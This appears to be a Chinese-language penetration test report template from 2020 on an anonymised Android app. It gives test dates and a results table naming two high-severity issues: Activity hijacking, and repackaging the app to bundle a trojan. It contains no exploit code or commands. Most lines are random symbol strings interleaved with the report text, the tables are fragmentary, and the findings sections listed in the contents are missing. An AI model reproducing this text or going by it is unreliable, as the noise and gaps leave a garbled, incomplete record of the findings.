. ?3 ^: Z8 x* u1 Y
+ p1 ]+ d5 e9 u# W, I- T$ O , X) M6 Z% Z; ]* V# o' p
" I5 S$ X+ n7 y
- l) P& ?# |! M2 }" l; o M- n6 @
]* y6 @/ {) M- ?9 y" o+ { 5 t, S3 y) U/ ?# o; F. m9 N- o, _
' m" _* E( i4 m# b6 W" h7 O- G
7 `2 L1 H# ]9 S, n R
: R/ k, J6 u* U9 {) | ( }% }3 v+ ~% W$ R
% N' x+ B/ O, V 文档编号: ! C8 k2 F9 p5 l5 }
$ Q, r% S" n! x; y
4 |" Y- m+ |& G! X6 ?# I
7 [- C- J. m* I) G" P" o
4 o2 v& ?5 J, K4 @, f. A( g$ Q; u& U4 E9 @6 s- R! b3 ^
! {/ j+ l0 H( u2 J d/ m
X( K3 f/ \1 W9 e$ \& e( z8 n ) R+ U) }* E: A: Q4 c
) W% G; Y5 A g8 o5 U8 o
, Y% S% S V- y7 P
0 s% z) a) `. e1 @' k ( j! Y q' ]6 k4 E$ \
. X7 g6 S* V; s" s
" {' h1 C( s/ ~; L) p$ u
! j; {% z5 K; a' p. b
! g' [: R7 l5 |/ F! N6 I3 U/ j7 n. X3 `
( [; w9 i8 d+ ?' n; @: x. \7 |" \ w2 h
& O( Q( }0 P. v0 o% a0 ]
7 ^% g; P- R7 I% [8 t& i: z6 l
5 `8 W6 A: ^, r0 S3 b+ t5 V9 s
; o3 x3 z" r# y: B' _
# k" _: I: M( g* \% ]2 s; ?; q- ^. s( [( P: `/ q
7 w+ `- e3 D! f: d; @1 X( h& {4 K" }8 A" l
+ \. L1 X& _% m" C/ Q# m1 J' n
, w: Z7 x3 v' x6 R
! `0 ~) M* l- t2 `
- d) I5 X, {1 A
6 u; N& L' w7 v5 I( b$ z$ g
9 D2 T$ J8 |5 T! U
7 R& {# ~: e* D; ^1 O {0 a+ K+ C1 ~! Y# _6 W" Q
某某某APP渗透测试 ) g# M9 h, A, A& ]3 N& T' R# B
3 o( S* h$ D, `& R' N/ F4 z4 H
. H% d4 }' ^+ `8 V H6 ^5 B
' u! M# }- ?2 ~8 G( B 5 p$ e- u1 X0 H' c0 `% | g( U7 l
2 ~9 P/ L k" N/ ]+ C9 x$ q
, x4 j) w. ^/ e% h2 A1 t
, f) g2 @1 |# @* ?5 L
* `2 U8 c% f: X% L1 \$ c( l' S- s
- {$ D' G0 F( H- p9 b
# [# r2 ^7 [ a4 A
7 _) K( o8 o9 R. W # {; t3 C, e+ w4 v: D
) v3 V' I& r6 g2 R0 b- _( Y" H
+ }" w- c) M- |
+ y: X* g; q' O
4 v o9 L% b( \$ K" _0 s% y; F: J9 E, \
: E8 t% d& b/ X% X1 m+ j) ], y4 k* ^( p6 p' H* Z
: ~/ }4 D1 ~7 i$ _' ?8 S1 F
( p. S# {3 t( E+ Z Y0 U) t5 T
5 L6 ]& Q( q: }+ ?$ O" Y
& l" j: w8 H0 a
# e% T1 X }, B1 e
5 l6 R( E6 y* A' o: A9 h9 ^
p5 B* t- t' s" x0 i8 M4 b$ A3 P+ R3 A: z+ m
# q x4 Y; E4 G% p* H3 S, g
: P: q9 Z4 S5 H 技 术 报 告
7 D. ^ d, w v% w1 R# |( [. N* b0 u7 M( t
9 ?+ t3 K: r7 X% h. Z: B
2 `0 a) ^( J. Q% d" @! R+ k* a: E8 t: k6 N; u
( x, p7 s! k" F8 \, Q% }2 H% {, [7 i( k6 v5 ? w! I. V3 K. g3 o
6 b& p z; x- r5 x: X- i1 w
" b/ P( H* C& j
/ `6 |" D$ K# \1 w6 ~& s
1 _8 y6 T/ H! l
. z8 Z( j* }. h) [; m+ z& T
; W* ]# y0 q, @0 i' X: b7 D
& T+ A. S _0 w* j5 M$ ~
( n2 q% E# U0 K& L8 v4 j2 K ! v, q( {4 N- Y! v, ]5 e
6 H* `/ {' h8 F# X0 ^3 U5 H$ R7 a0 Q# [" d
% w: O& b" W+ s6 s6 n* m0 |5 ^
! D9 N7 ]8 ]' ~6 M z- [: H - n* ^: g) d' o* {
/ m" q+ ?/ y" y6 c( f
. y/ @& ` k* @, A0 v) s2 y2 r
- V. C1 A. w8 I/ [8 L# P 6 h) a" p t/ R
9 F6 ]) L. j) o% U, G, M+ K $ R% J5 x1 z4 I" E3 j# O% \
& c F' O% {, w+ d
: _! r J9 D; R9 W( d" h- b: f# i' c
9 u/ y; P c C% q: s# [$ j0 i' t9 w- A$ P+ T6 g5 `% Z
1 S2 t: |1 E" x! C2 e. }7 P, x# U7 |
2 j9 g8 E* q# C* V7 W1 d
5 {) x% i' Z9 U% j/ E
8 ?9 c0 K( U5 e% ?; @
' O% `# p2 H" ~8 ?. q, ^, @) v+ w, k" u! ]
( F' ~3 J& z1 U- [
2 Q' w J- B! u* Q, X8 u6 Z
4 @1 Q/ K: R2 n1 A* q& O" G6 T; z7 c/ {$ Q: F/ p; M
: c* t$ M6 m2 |; w: F
3 D8 ]1 T' k& ?5 d / V9 a1 n5 ?5 b8 t8 T
8 z; G# P- `; @) ]: B* q, @! b# t
7 ^$ R5 e/ O% M1 h
! z8 q. |' m2 v
- ]$ E; S+ H# q% T) V, U" G( ~) b0 R9 @* Z
$ ]) g X4 Z. W# ^! g0 D
W4 y2 @6 s2 L
* E, ]2 }4 _5 W, E2 X6 S% t5 ^! e, k3 T( [0 Q4 Z
* N/ @5 ?- n9 M2 P
' j" z, _+ Q l- K" b 2 C0 o& o, Y' o' c7 ~1 x
: R: z. L6 E! j* a: O7 |$ Q/ ^ F" H " b& l5 u5 C: p/ A( N* S3 ^- D
* D& C ^: {, @' @% C5 ~
% q# h3 o. u1 l
) V0 h5 M6 p+ h
- h8 L4 c% U& g2 Z
# `2 D& T. f2 g+ i& ?8 c& j% i 3 W4 U2 `8 D9 u: ^3 P
5 ~7 [% Z) _; ]8 L4 @
9 g2 @" w9 H) t: F/ b! a- e S* c# @$ i0 e
' h( P. A3 _: l9 R- a, u1 X% M
3 B7 r3 F" P0 p0 P- X. y1 K6 V
* |; f% B% G% n2 | W% x1 \
; h. R% @+ v1 |; |1 ~
/ l8 v, `- Z* h v8 D9 |/ t* F3 R3 Z/ E) q6 X
- d: i. ] q- f. w5 i5 k- V
9 U" }5 j8 G' a# r+ ]
5 ?; k: C% ?/ ]; R* G0 N. J1 _ j# ]& P5 Z2 L2 O4 P
0 g0 r! h4 q; f8 g9 l7 d; |/ M0 l
& W* b1 g1 C. y* X5 y# x" C8 W c/ H
$ y- {( s+ X' N3 |+ @( N
; i. a ~' J9 \9 P9 h$ Z
/ k3 c6 N7 a/ R, R2 y3 s$ H* h( d. r2 n7 d* h$ Z: m
9 H3 @# }$ O0 ^8 s6 n, J4 l, p
|# x* |: w' R, n8 x" s! h7 ~
# q* |; y, I2 I: O" Y- q y+ Y; j, M; b- i3 ^7 f
% g2 i* h m7 p4 n, f# l
) V! }3 y% b% Y; {! z! ] 9 D% d3 X$ D w
5 M8 [" ^% ?% o0 X
" z" o: q' l6 e% [: f& T
2 D4 k4 ]6 s+ y: d. V1 J 2 v& I# G0 P5 ]- b+ Z- |% K
! V5 B' j8 S4 Z. h
0 V& p6 i5 n4 l! {3 T) v: h! O3 V) s: y9 d( w
1 n9 K! n( b3 D) \: w
$ _, X) X \/ ^& ]# i# F # J% F& r4 i+ U% u7 z4 K7 ^4 M! \
$ H, ^6 {7 C2 l9 X4 u7 W . ^% e6 ~* c" k; u# u' j# Y S) q- a
) ?+ p( H7 Y" H! z
* Z" M1 m0 [/ P( N ?
2 R1 s. R0 @4 g2 j3 n
, I$ P+ X4 Z3 o2 ~- ?. Y/ `& ^# c: j
9 q+ {3 _" i- O8 ]+ p
! Q* }+ w/ S5 Z
/ J9 f. i0 k/ y3 u
1 z- g# g1 Z. r/ m- ~3 i( k
; F: W3 o; N7 e- W* Z ) |, ~) q4 O$ N' |& U6 N0 Q
& g+ _- S9 V; R$ k4 F) ]6 H
0 E0 a& N9 l& y: `& D% r% V
8 @2 t, Q' }2 {( v, Q/ A3 y6 ] 二〇二〇年
% F0 P7 n h; ?! Z. @' G, ]6 c" d5 }+ v ^
4 P8 k" ^, k2 t" W7 J
) t8 B. I+ ]: }2 c0 k) v% R. {. {% ] 5 `# B2 J$ @8 b2 `
2 q4 x0 e& t5 Z8 w/ k : H: _" }- h, P6 p4 d: V5 p3 |9 ]+ e
% H* D* X( d7 M( g8 h! [2 t8 D 6 ^7 b) k9 J8 \5 D, M! s
6 z$ m- ^) D' }+ V% h- ]
( a1 F1 ~, j: w* c, ^ U5 S1 @7 D& U# r" K
3 h, {5 Y$ m3 n/ ]
* S! {6 E8 K# K
! n. u9 X- n! p$ Z3 d9 X
( t: S' c# |' S5 Q8 r& P/ s7 T
" J9 H3 A1 |3 ~6 |/ ?& ^4 s
7 u3 J- C( ?9 Z3 K) t8 B c
) I4 w: d4 s( B3 h3 g( ?% g: S
6 F; ]4 g$ w) Y \- E8 r
, y$ U( f8 c- g& e- k; q o% `/ a! t* X0 u0 M& m
目 录 * T) C6 N0 k- ?
% K. ~6 _6 R8 c/ R1 G
\6 ^1 |; H, R9 a3 W
" W1 |8 s7 f m) B4 b 0 G4 A E- n v: G/ O
" h/ G( n3 k& u3 ~. ?( e % g+ e% m6 S# ]3 x9 U8 a8 }, R
# B& Y$ x6 C/ B5 [& m
! t" m. y% @( G0 W
: Z& J1 m J6 K; w$ o' m9 j* d
/ |" q) ? w) g& E, P7 {+ E5 z' }7 d
" |( i; |: Q) F$ Z
1 w8 H' s- x# y9 S1 U: F+ G: \; y# G- U
1 概述... 3
3 N" z, Y# D! H$ |2 F" A" l* Z
8 }0 |' e* ]1 [, o% P5 o2 Q
; g9 `3 e2 A0 q7 R2 }8 _) n& m1 N- {- ?+ }, h& _ m
5 H8 b3 |3 w! R& `1 l
: `8 Z- ^) {; e: _. H/ p& p/ R$ v
1.2测试时间... 3 # d/ p5 b: H) V. M8 a, R- A) @
. r" D4 K! U% \1 s6 K; j- }
' U. I8 p9 B/ L0 ~7 @+ t4 I" O) f. l/ Y$ O& q
: F7 b+ W: X5 P! R# t- j* j- D
) g" r/ i8 L8 X' q 1.3测试对象... 3 1 R5 c/ y' a; O7 C
4 j! r: Q/ _- ?8 T: J+ ^ f
$ N, F% k( M; E( I! \, H% _4 J
3 e& L" F% N+ m4 g# W+ g ) ^; W j) c- ~
5 z6 H7 P }6 L" e# B. y& T 1.4测试结果... 3
' s C% r5 `$ E$ B j* E
$ d2 o4 Q9 f9 X( {% [/ U' t 8 w" E1 |+ S$ C* X/ _# `9 p0 I
# \& Y1 o$ |! U+ h
. D" J9 O$ o/ C( o4 z% Y
+ L, D! l$ u3 l: }) P2 Q- F 2 检测结果... 4 " Q( G& {" q) ^' |
8 A( p- a* }$ e. X+ r; V( J8 n$ H
; L' x) q5 D1 D0 T
& f! G# d/ V0 P% S
, B+ S3 j( C! n ^: {5 s! C9 i7 W; q- X6 b& k* r, A% E( z
2.1 某某某... 4
4 i1 [7 J8 p6 c# h. l
& `3 B. W9 p* i& {
+ A# l) ?3 O7 R5 \
9 q9 E: ~* {' J6 m 5 m, H2 w! K0 n- z
/ v. p9 _4 r3 x, j 2.1.1检测目标... 4 % k8 U; w$ _( ^: b) @
* B, ^: j3 ]7 D; g2 e4 |! b6 j1 \! b
$ ]4 T& E0 G& v0 N- }
; ^0 g+ c- G! U& R' |4 \
+ \8 v) _; M5 h) G+ F9 `: {2 ]
# u% U& a* Z) \' h/ ~ 2.1.2检测结果... 4 ! p6 K. M& \3 M* V, Z
+ n! [% q$ D$ @ - I: `5 F% u$ s" t( G
# b4 J. n; b1 _
7 E6 x3 J* u, a5 F
2 U# ]& ^( C Q% {3 m6 n 2.1.2.1. 4 # ]* `$ t! s+ m& G
7 ^3 B1 G: y% X! N5 L, C* v 7 P; Q# }- M+ n; ]4 S
( U$ h [; U2 a, W) _9 Q. ]) N4 T ( S6 _" F5 I5 U2 a5 P$ I& P
0 N5 L3 t1 R" A- M; F. H
2.1.2.2. 6 9 W0 G7 x8 V: P- C: J/ @" ^
( e6 M/ t$ E0 N. G0 W1 p
$ u# r8 I' _. Y+ u' R0 W( k$ \7 F# B1 B
( r3 N0 {; C0 N0 s6 j' a$ y
, r6 |6 }) Z. a9 E2 c% s- S& @) D
& V4 @( q- k( Z, Q2 m- K/ v
% ?8 m1 X. `6 Y/ K, D9 ~ S
2 \0 P' P Z% ] Z2 D6 l: Q2 d- C
; c% I% U4 b& r/ C" t
& a7 B: K$ f( Y+ U# B1 F, v/ }
J0 b! [$ G9 B; V# p5 b
4 B6 @: s i" S+ x: e9 R
4 e+ F8 \4 v. S/ M- F5 a& S: b- m
0 ]" b7 R5 Z5 j' T/ Z$ g/ P8 x) w* R
: j& m ?1 a' b; r" h2 w ; v' @ k$ {( h2 \; h/ [' v- u
- m8 V, o$ G( F9 S, ]0 T
1 概述
, P% l T8 c& X. P- M5 N6 Z& i: ]& Q) z, r: E
K+ r2 O, X2 E2 e
1 N1 n( n; g0 a3 v$ `; b
' Z1 D( n/ u. L$ u: ?7 ^
- `1 R2 N/ {4 [% `- {- ^8 s
1.2测试时间
5 S6 j v1 w4 d% x: h) S" w8 y# [6 }
( g' {8 R1 S& s3 t' I6 F2 R, v- H; m
: U8 b4 B( v# a& ]5 u5 j
; M: o s1 u1 Z6 @9 h
$ X' H/ l+ _: Y+ r% g5 q- [
* F% @- H" n0 W9 G" C6 k1 W
7 R- G1 k) v0 a. Q7 ?& |1 ^. E ?% i# r( [% \( K7 X2 K0 ~
4 @; s3 N2 ~/ p+ T/ C8 b6 X2 u! y; U( P( [
* q7 A" s2 ^$ o, ^4 B9 p
. H, G3 X9 r8 X3 p+ z" F
渗透测试时间
" ?* Q' Q8 ^9 I# o% Q- s
! L; @% H4 {6 n6 p$ p5 O! u: O
& o$ Y& b: o5 ]5 j- i" n7 ~# f/ c9 S# V/ T. i5 ]3 V; r6 c
|
4 L* [( v; ]) E6 C% y ~* \! @3 v6 L$ ^+ d0 v
# O) W5 ]$ G0 r" i8 a9 l
) r! `- D4 ^( W. w8 P+ k# u' G) d
$ h# F8 F c, Q: ^/ S1 w
9 r |7 o- P+ F. A3 f" N
# R9 C/ m, @# y, {: t/ v5 [4 n3 P; z! ^* I: X( ~! s
: t8 A- D( F4 X0 Y
. c$ _$ P. d9 K P3 G
起始时间
2 l% ^( ?1 J* t8 h$ n, W; {: F/ Y; Q5 m; o
, e3 {2 |. U6 Q1 c' A' h3 X1 Y, f- A" x8 V3 U& x q
| 9 z+ y" Q, ]1 k5 P7 }; |( z
+ \- E# q) {; n; O+ K, u" J
! Y4 q [% E; _6 x) b* G7 u
' r3 A, L. U2 J/ @9 z2 c# m( c: ? 6 F# p) c- X/ K8 r- c1 C M
7 D U% m2 b9 E$ K0 h2 c2 h
2020年4月6日
# C4 @8 W' u! A3 r! g% v: Z1 `
6 u: A" b& i9 l# g! a& K' j$ Q
' E) G8 q. b7 x# p |
6 h' C: _8 T9 A- r8 b0 J0 v& V( k8 b/ \- S& X% ]) w6 U- z( C! l& ?' ]
% l# w/ O; b( q& L6 D, }7 C+ Y( s1 r1 ^8 {3 O0 t/ q) s- M5 a
7 K4 s8 k* C- U K2 z8 ^+ H( K& C; m9 ]. Q+ `) I
8 l. E$ y) f; \- l5 R
: D* n( }) b @) `. K+ |( k
4 m) k) `3 J; o8 v4 \* G+ L
, h7 ~. O$ n: H" y9 s, Y% H 结束时间
$ ~3 b1 D! ~6 \
0 i/ N$ w4 ?1 |
2 A5 }+ ?/ ^& B6 S" {/ }( p* R8 j! ]
2 o2 b# I [& H3 }+ Z, j& I) P |
! x8 g" }) _- d' c4 H7 ~5 G
8 ?5 L8 Q9 n: o( W- ?6 n3 L" }9 S
- M5 d6 Y8 Q$ S
) ^5 `8 }# n7 F; ]6 E 5 r4 i* L# T% z1 R7 v6 m# w5 j
. B; y% b/ d" c6 c) R& k
2020年4月9日 2 W& ~4 K/ b- ~) L" o
9 C. z! }) p' w3 t1 ?
' D+ c7 B h! V! s9 |
0 H! q+ [& V* i6 F% f9 b- ]) {
| 0 x0 A' Q; H- X$ J6 p- ?' x) J
- W. {! N4 W* U9 J* G _* \# w. t" U H; J) @
5 j7 i" _. a0 a% y8 @3 R
* e# d5 P/ x" b' j, Y
1 m* o; @* S8 O' \8 q% c- B1 b
L# ^( \8 X n; s
* j; k1 Z' N& g! f: j
" t7 ^- m( d8 Z, F/ t4 A" ~& {; ?7 a; u% x2 Y4 I, G, e
1.3测试对象
9 B, }# D0 G( W/ B3 g& f1 s1 E2 F# c5 M. j% f4 b+ V6 t' _1 |
. f% V( o1 U4 s- N& ?
/ @. I' Q3 B5 A& |4 l. c9 M) C 4 U9 m8 @ T# ~' \
' m' G5 a; y' s! |
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 2 b9 k# k5 s; r" T8 D P5 _2 g
6 y4 [( \( @' y
$ i; X U& l% Q4 U2 f' P9 h
$ M4 b* d+ X7 ^# \( F
, {' J* K: C6 }
# r$ y C+ S' B4 s 表1-1 检测对象
|" }& C& O: L' ?3 M1 X# e2 _
4 i5 K' J1 i2 S8 ` 1 E5 r x9 V' ~# J& [ J* M5 \# k* b9 D
2 {' V8 b/ m0 Y: B* g$ W- Z7 X! c
- m8 b( `' g$ R4 p+ t# I
6 {0 c, m5 n W3 r) |3 Y
2 w% G; ~0 S2 ?& r& q8 R. m
4 s B+ v+ j) w# @6 u, K" p
4 p: h" p7 _. r( v: _$ i# T/ I
% {( v9 L% L- [0 I 7 w. b' N/ Y9 F8 x/ s( Z$ g* z- P
* B0 b( }) z( \0 l( }9 r 1 _5 h* M& P$ N8 \: h
0 h" X& M3 p0 ^( B# a/ b0 A
序号
* P/ v; O6 X* m/ \9 W0 m% V* h/ y# A9 n. f2 ~" ^& Q! a1 `
9 w( E! K) t' k3 j- ~
. Y, Y( u: @% R j, a
| ) T: o- c4 ~* m; ]
. B1 W8 C( y2 Q0 [$ c$ f2 \! C% o4 \
1 b x5 ~& Q8 ` z+ R
2 z( R! j9 V# Y. K& u, E( x
1 @% d* W, ^' @/ y9 k! g
0 g9 N! \2 Z4 ^" d7 I) c* Z 测试对象
' `" D4 D9 U, {5 Q5 z& Z/ {+ |' x7 O4 D
- W" B9 @: v: l$ _, ?! a" P' y) ~8 d6 n8 s7 y
|
8 s: B% b2 _5 t; Y6 e
0 F8 R1 G! l/ y & D2 f; e9 a+ U* ~0 [6 p4 l4 Q
' ^! n( \/ I# ]1 Q. K
) Y( B6 R6 ~/ G% f
) I, ~3 a* c8 H 测试地址
; Z" ?1 i0 p9 E v+ q$ D+ l# W$ I
+ ~/ R5 y: H N9 B$ n8 {" T
7 \4 Z9 y: Q) l# L2 Z, Y% c1 m* D" [! G: g5 W
|
2 v9 t) I/ M% x/ W7 m2 E" F7 h9 t* P6 ^; q8 ?- b% |, W4 z
8 i: h6 m3 \% _
6 f7 a, H- V& m% [9 r # Z5 ^ d* [6 p7 G' W% F6 G v" b* k4 _
) f0 I4 J. R" B: y# P& X: d8 M5 r
安全漏洞
2 ]% I& x, d6 j$ \7 _
7 E. ^1 q- }; v " k3 q' s, g3 f% W) G
9 O4 K/ q/ e& o; N6 t( e
|
/ f2 }# z. U7 {% p: M! A, L- I9 z/ q+ I% J6 v. X' ]
' \9 r1 Y. k' w
3 C& j) u5 w. m$ i$ P% ^- T # X2 P2 U8 N0 m, Q: ^7 l6 F
. N( I! d, p/ E2 r( }3 L. }1 m
: ~* t7 Z. ^5 j+ L1 E( b. X- M# F
- V2 k Y7 C, ]1 S/ G- p; n( C
$ ~+ ~ U( o9 F4 i+ B 1
3 ^' c# G$ L/ E" d! }5 Y+ ?/ Y# n8 O
o$ `2 P; X3 t o+ x2 y% s
6 C7 J7 u4 g+ @& i
| 0 s1 y' n/ j, r% }* ~
7 L) N/ W C0 {7 ^2 O+ A: [7 L6 q
( @" s' @2 |7 s6 e v& I7 ^1 n* g( B) {
7 J+ X3 Z4 j Q @
. w' D% ] u, h4 m2 x( x/ V
某某某安卓APP
, u, @8 X. c7 p' {9 A; P# ]6 m; i( R, Y, L ~
. T3 o! q% e: P; K; E; Y
7 [2 p- C Z$ L) j1 [ | 8 G1 t+ p2 I' C* ~: o l0 ]4 [
% _5 J2 r9 J7 v, f
1 T- T+ [& _, }/ ~+ f6 Y
4 E* y9 I+ O# c! \9 Q& X- \
$ |" e/ z/ t3 | |$ P8 ~( W
* G g' {* l: |
6 U. N; o% O* M$ ~# M( V- e( [( w# V) z0 n
: r" S( f2 |! Z; z2 |
: e( K6 [ J( W | 3 r, z7 o1 Y, _) E$ L
: a$ a# p9 N4 `/ M" ]
8 u" A# ~; f1 W) @' l
* k; U) _, \+ q7 H- m1 x" e - {/ M. W1 n; W
: z: c: o( `/ c 2
7 a2 E- I4 V+ U/ [4 G) ?0 O3 Z& D+ \5 f. Q( a6 \5 q
- Q+ B4 x$ ^: }! y7 L d
]: m2 o. n- x- q | / d/ D3 M- [, k0 _' [: @
3 |$ L( m* W6 |- ?" [
. c U. W5 A- K0 H8 r+ h' [+ s+ _" x ^, b% |' f( v
- i" S1 c! e2 J4 y1 X8 O6 v! F$ S' ?! e
; j4 w/ h# E1 j" e
" C/ J) z2 E3 _! O& i; s G2 r3 M
& x+ n% Q: `0 \1 D/ w$ d$ W0 `9 a" @" j5 J: _$ }# q: n
1.4测试结果 & ~7 W- B& q( L: f- T( ]
' _1 g. g. I1 G9 ~! V
7 q! o; p, B; p. w
" V1 c/ e4 v8 x% V- @ 0 U. H, ]2 o- `! W% N
/ k# F, m/ v8 q3 u, I+ u7 o 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 P0 A' I9 l4 r
" ~& s! a3 j7 I
* e0 a+ ~: o$ v A, A, o, P, Y- m. ]; q8 y! f4 G7 d7 {
; C7 r; d& [/ B% y6 X6 x
+ a0 ]% V+ m& |% L # m* c5 ~5 R* {# F2 b+ n% h3 k
( h3 S6 I) o& T" P. {4 `) B- {" J
+ p! i) r( H* d4 m7 v! a
3 l& a5 V- e$ _0 L& \) h
- a$ Q1 l# \( n" W" A" Y7 R* }" e9 W
7 Y0 q; Y' _& @' C4 g, L4 Q" J7 x+ B) Y: v
! ?" o z1 a$ K" V) C
7 H$ ~/ S, o" w6 @3 o3 b5 l" R
* f: G: |' l" h
" X6 P' {: D5 z8 e
5 G1 M+ j, t1 P; D. `% ]. X: j
1 S5 H- P" [+ }* K8 p" D
9 t* R% _* W0 t) b
6 m f5 {" T6 B! b5 F* H3 Z 序号 / i$ O( ~! Z, e2 [
+ H) r1 M; k. g7 O 4 L9 K5 q* f7 ?- W, Q7 I$ r
# C3 L. U r" l" ^$ a
| . W3 F2 K- \1 G% S/ r! G
) c K' ^' L3 L# R0 \8 c& i
2 |1 ] s, E! E- e$ Q) j/ @7 f7 c
* w! }$ y, m: D8 W2 t$ A" L ! K3 e x1 G1 h, \0 F
" M' j9 w/ B# D" G+ Y, d3 Q6 F
系统名称
; `+ {% s7 a. }5 g! P; e3 G8 P% s: e8 t
) W0 E# K* I$ m$ Y5 e7 G3 e
* i3 l& A- g" O' R Q) C2 ^ |
; \/ U( e" s# y, R
/ {, @0 v4 x" E; U( z" r % C* s! q _ Z$ p) ~: R1 P
* g- {+ j$ b. s6 Y9 o
2 g. w9 E, D; w! b' @8 _0 y: a# d% ]) Y1 v: y! d
漏洞名称 ; l: Y) `/ @- W/ k5 k* h3 M
E' S$ A" d- E4 t; a 1 F% a7 P* M, Z
! X* T; f' h4 K: ~3 Z7 y | 8 x8 z7 H' d+ ?2 U
. S, v5 X/ N# i: N4 ^- }0 `& S" y * I, f% l, _1 ]1 G6 `
* T( `& d) D, J0 L/ i# T" y 8 ?! y3 Z0 o5 L! w6 J) l
' X6 c0 x: @7 ~- h$ ?
漏洞危害
8 t* H( M, T9 v+ ]( }) A/ [+ R4 y" E* Q" P W9 y
6 y& }; Y# Z* d z$ }/ d; i
3 ]) R1 A+ M) a6 z# _( u
|
/ d% d: Y& j( `. u" M- P8 P9 M
$ L q( c/ F: Z) T, ~) f' I( Q: r: P
# s- j" ^: E1 F5 P. c9 g, `% @3 x7 e i: q
1 F# C, c) O9 X. e3 r# X0 J
7 z( d: D/ r4 d$ Q( t5 w5 Q! } 修复结果 - k9 c1 s, R0 N6 }
6 }) c' p5 j/ B; E5 Z J; U1 M
$ o/ z7 F0 A2 L! A, W" a0 {
' M1 `. J! R" A, }0 w0 h1 U, o2 O |
2 y( M1 J; E, T. u( T! q
' C& a( p% I% M; z( j. Y0 I1 S+ ~ % D8 Q( @' g: B- c) B, D
/ D- c4 ?0 M. C4 W. L* q
: N: A- M8 ^, s1 R
0 @/ C8 a. l$ l2 }; r
" w: u+ |% Z) W) |" \& |* r8 V4 P9 K2 w8 I+ z( u! W
/ X1 D7 v9 Q1 f; g+ M
6 L; D9 e! i; l; p 1
/ [1 o2 m& S x) t1 S
6 n3 W q7 F6 z v% ^" ]5 W/ V% ^' } , x, T* s" `5 r0 N
}# i3 y- @% M! ~& j0 j; f |
) p; G3 f3 x; }
N4 h& E' T% O; T( E
* r9 \: F. G& z) j
3 ~. W2 [8 ?* T( Q3 E5 d
* {& k% D* D, {$ U# Q9 b! M3 {$ i/ }0 L5 x7 A* B
某某某某某某APP
* T I8 |4 J, J* g) Q/ v* o7 t
5 B0 v1 F3 _, r! T/ R) _ ! A, f2 s" a7 ^+ B1 O0 P" j
t) E3 `3 y0 e8 \4 w
| ( W3 R' E" Z% h& p6 z6 k
; e1 U6 ]) A% q, o" S7 t
/ Z% S2 E2 F+ C3 p- {
5 s/ w9 [9 e- v8 P
- |9 f- m% z, N6 G9 \3 ^ W
' c" e1 \# E6 r+ e; M0 C Activity 劫持
2 a8 c" E# s5 k6 X, ?% `
- S: A7 ]0 d4 z6 r$ i5 O- F 0 R5 C8 u0 R* U! W" V* L
, `2 \. k% s* r( G
5 G7 H0 v8 M4 {( O; v" s
/ W. d$ W6 z6 A) M/ ~
* `' [4 X( D) m9 C
$ j( z3 E, _2 s {+ c * Z `- J7 q5 \) s
4 H( o9 F' Y: A) T | . q1 O' [7 J Y3 \
- ?+ u' P) R9 g) d
, @2 [- T9 q. R- M% u" _! o; _ u |4 r, e* S0 x
% ?' P' S- ~0 `8 c! v- `3 U
( w. Q: i6 o5 n/ z1 b 高 3 q2 S% O) S) s$ W0 u
+ T& N& r# ]* e" ^/ e" W7 U) I
; H- u+ f' a8 _; S1 d/ ]5 [8 s/ o
% K7 @2 n& d7 _5 n2 h |
! W& y' h+ I" u+ I [# E: `: N6 K* a: ?0 N# F% t
3 m7 C! }' {) X" i- d9 _* }( Z2 j7 _) A+ i# q4 V+ C! l7 H% y: i
" M9 T _6 `. N, Z( Z
$ T2 [9 c% Z$ } z7 u . k8 {( ?# ?3 `0 j9 ]
/ S' ?/ J8 Z- N2 u' |2 c
- a' ^& w. t, x# r4 g- T# t, I$ ]$ f' B& c; Y" J" t1 U4 U
| * s) O$ d0 w# ]' q
% V. q) e1 A% s0 u/ u. e7 p4 ~
- \7 W7 j4 K* B9 [7 u4 {7 k" q8 G) S8 R: t
$ v+ K. f; J: h t+ J; e4 d/ S3 T
: F; a# @$ \& a8 h) e5 J- H
' d" w' d! Y* V: N& X8 \
3 h: m. K9 f; s3 a# T
; |9 p/ [: U' Y4 o* Z/ l6 [0 V1 \5 ? f" x
2
: z- z, j. J4 R, G" d5 h- W- j+ P4 N; [) N* U& a5 J, X
! t3 g1 }" T- Q2 A( m, [$ n% d- v& ^$ e0 J6 ~, F8 R H
| 5 ^4 P3 N w& s- U) ?( `
9 g% s! S8 r. u {' L0 @
" t1 _' I9 ]7 `4 q! o/ n
' [ l! i; F0 I* l5 o/ p: ?, K
5 k* c. Y7 j/ U: C/ h F! ^4 u4 B* a4 l( Q
某某某某某某APP 0 t; h* k- G( D7 T' C
2 c& |" k* Z& K 3 \7 \; D1 w$ j% U
/ E- }1 Y5 |/ j O! u2 S- D$ ?
|
7 d w$ U" W/ q( o4 i) \5 p9 G: D$ ]! l
/ F9 N$ m, J. Y p, Z- k0 `) S2 x- L9 q% }$ F: S: e
3 O7 ~( T; K+ v0 R
j P1 U/ v& _) x 反编译二次打包捆绑木马、篡改APP代码
2 c* N& D) E$ N8 \' f- d
; }% C! h* f% G# N
" l% n* E- } P9 m" k
& A. {& D3 O9 s; h" Y; u |
/ t4 x( X1 ]0 Q, g c* Q
: v! s' B8 n" f5 f
; d6 s* a. E% j$ z6 C m/ b) G/ ~9 e% X
9 F- A1 g! v/ ?3 }, k; _. b$ D& y7 o4 v1 T* I* m$ J
高
( F* v$ F1 L% h( Q y5 Z- ^
" E9 i2 P- l i' D 6 u8 D7 e7 _3 Y. o. j
& J1 p+ m0 b2 n3 c |
( q* Z6 E0 A6 Y6 c' U/ I' Q& F6 k5 V/ n6 w( r% Q7 q1 [* _
4 ^7 X& X9 Q, [- j2 G$ b% t
7 [, n+ p& @1 \) a# {. \
, J, S: i4 A0 a, R# i! \( o
2 F. c! z) s0 \
$ {- ?7 y$ f. v# m- k8 a7 U
4 z% }( j5 r9 J5 E7 F
2 L4 y4 v8 Z$ m k! |" A
, }2 a, S9 j4 H# b3 ` |
/ D' C$ `7 E" M5 f1 ]0 }# ~+ o2 \0 e( l# j0 B
5 X/ k, F6 p& W4 a+ D* ~
! n+ B3 ~/ T! ^" K ~4 y; s
- ?% h9 M# O6 V
7 S1 z% N" [- R! n0 I4 @, G
7 q0 S; u4 t, c4 N$ [0 B. G! ^3 r6 u5 d; k ?* T. d: z
9 B* S: ]% U) x0 `4 l/ }
c! ^+ w1 V7 r5 D0 {
; t; K" l7 v3 x1 J4 M! p2 U
